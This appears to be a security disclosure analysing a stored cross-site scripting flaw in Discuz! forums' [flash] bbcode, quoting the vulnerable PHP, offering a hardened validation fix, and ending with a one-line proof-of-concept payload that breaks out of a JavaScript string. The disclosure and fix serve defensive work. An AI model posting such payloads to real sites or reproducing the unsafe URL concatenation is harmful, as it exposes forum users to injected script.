Discuz! stored XSS vulnerability in post bodies

0x01 Affected versions

Discuz! 7.x: reproduced
Discuz! X3.1: reproduced
Discuz! X3.2: not reproduced
The exact affected range needs to be confirmed by actual testing.

 
0x02 Vulnerability details

The multimedia code feature must be enabled (many large sites currently have it switched on).

source\function\function_discuzcode.php

    if(strpos($msglower, '[/flash]') !== FALSE) {
        $message = preg_replace("/\[flash(=(\d+),(\d+))?\]\s*([^\[\<\r\n]+?)\s*\[\/flash\]/ies", $allowmediacode ? "parseflash('\\2', '\\3', '\\4');" : "bbcodeurl('\\4', '<a href=\"{url}\" target=\"_blank\">{url}</a>')", $message);
    }
Following the parseflash function:

    function parseflash($w, $h, $url) {
        $w = !$w ? 550 : $w;
        $h = !$h ? 400 : $h;
        // Extracts the media URL; the trailing (\?.+)? group accepts any query string unchecked
        preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);
        $url = $matches[0];
        $randomid = 'swf_'.random(3);
        if(fileext($url) != 'flv') {
            // $url is concatenated straight into a JavaScript string literal inside <script>
            return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', encodeURI(\''.$url.'\'), \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
        } else {
            // The .flv branch URL-encodes the value before embedding it
            return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.STATICURL.'image/common/flvplayer.swf\', \'flashvars\', \'file='.rawurlencode($url).'\', \'quality\', \'high\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
        }
    }
As can be seen, the regular expression

    preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);

is handled improperly: the part before the file extension excludes '[', '"', single quotes and '?', but the optional trailing group

    (\?.+)

accepts an arbitrary query string. A single quote can therefore be carried into encodeURI(\''.$url.'\') in the .swf branch, closing the JavaScript string literal and resulting in a stored XSS.
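The root cause above is that the URL is validated against a loose pattern and then interpolated into a JavaScript string literal by hand. The following is an added example of how the check could be hardened; it is not Discuz! code, and the function names validate_flash_url() and render_flash_embed() are my own. It assumes the same AC_FL_RunContent() and $() helpers the original markup calls, and uses parse_url() plus an explicit character allow-list instead of the original regex, then emits the URL through json_encode() so no characters in the value can terminate the string or the script block.

```php
<?php
// Added example (not Discuz! code): hardened URL handling for the [flash] bbcode.

/**
 * Return a normalised http(s) URL ending in .swf/.flv, or null to reject it.
 * Every character of the URL, query string included, must come from an
 * allow-list that excludes quotes, angle brackets, backslashes, whitespace
 * and square brackets, so the value can never break out of a string context.
 */
function validate_flash_url(string $candidate): ?string {
    $candidate = trim($candidate);
    // The original pattern accepted bare "www." URLs; normalise them to http://
    if (stripos($candidate, 'www.') === 0) {
        $candidate = 'http://' . $candidate;
    }
    // Allow-list check over the whole string (note: no ' " < > \ [ ] or whitespace)
    if (!preg_match('|^[A-Za-z0-9\-._~:/?#@!$&()*+,;=%]+$|', $candidate)) {
        return null;
    }
    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'], $parts['path'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Check the extension on the parsed path, not on the raw string, so a
    // ".swf" hidden in the query string does not satisfy the check.
    $ext = strtolower(pathinfo($parts['path'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['swf', 'flv'], true)) {
        return null;
    }
    return $candidate;
}

/**
 * Build the embed markup, or return null when the URL is rejected so the
 * caller can fall back to rendering the input as escaped text.
 */
function render_flash_embed(string $url, int $w = 550, int $h = 400): ?string {
    $safe = validate_flash_url($url);
    if ($safe === null) {
        return null;
    }
    $id = 'swf_' . bin2hex(random_bytes(3));
    // json_encode yields a quoted JS string literal; the JSON_HEX_* flags also
    // escape < > & ' " so the literal cannot close the surrounding <script>.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<span id="' . $id . '"></span>'
         . '<script type="text/javascript">'
         . '$(' . json_encode($id, $flags) . ').innerHTML=AC_FL_RunContent('
         . "'width', " . json_encode((string) $w, $flags) . ", "
         . "'height', " . json_encode((string) $h, $flags) . ", "
         . "'allowNetworking', 'internal', 'allowScriptAccess', 'never', "
         . "'src', " . json_encode($safe, $flags) . ", "
         . "'quality', 'high', 'wmode', 'transparent');"
         . '</script>';
}

// Constructed inputs for demonstration (not taken from a real site).
$inputs = [
    'http://example.com/flash.swf',                 // accepted
    'www.example.com/flash.swf?autoplay=1',         // accepted, normalised to http://
    "http://example.com/flash.swf?'break'",         // rejected: quote in query string
    'http://example.com/flash.swf?x=</script>',     // rejected: angle brackets
    'http://example.com/player.php?file=x.swf',     // rejected: extension not on the path
    'ftp://example.com/movie.flv',                  // rejected: scheme not http(s)
];
foreach ($inputs as $in) {
    $verdict = validate_flash_url($in) === null ? 'REJECTED' : 'accepted';
    echo str_pad($verdict, 9), $in, PHP_EOL;
}
```

The allow-list check runs before parse_url() so that malformed input never reaches the URL parser, and the extension test uses the parsed path rather than the raw string. Keeping allowScriptAccess set to never is unchanged from the original; the fix is in how the URL is validated and how it is placed into the script.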
 
0x03 Proof of vulnerability:

Find a post and reply with:

[flash]http://localhost/flash.swf?'+alert('zksmile')+'[/flash]

Screenshot on 7.x:

[Screenshot: 1.png]

 
Screenshot on X3.1:

[Screenshot: 2.png]
